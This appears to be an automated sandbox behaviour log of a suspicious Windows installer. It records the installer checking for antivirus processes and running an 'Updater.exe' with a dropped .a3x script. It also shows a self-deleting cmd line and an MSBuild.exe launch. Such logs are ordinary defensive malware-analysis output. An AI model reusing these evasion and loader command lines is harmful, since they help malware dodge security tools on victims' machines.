Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 6172760 > 1048576
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Source: file.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: file.tmp.2.dr Static PE information: real checksum: 0x0 should be: 0x344343
Source: file.exe Static PE information: real checksum: 0x5ee9e5 should be: 0x5e3598
Source: file.exe Static PE information: section name: .didata
Source: file.tmp.0.dr Static PE information: section name: .didata
Source: file.tmp.2.dr Static PE information: section name: .didata
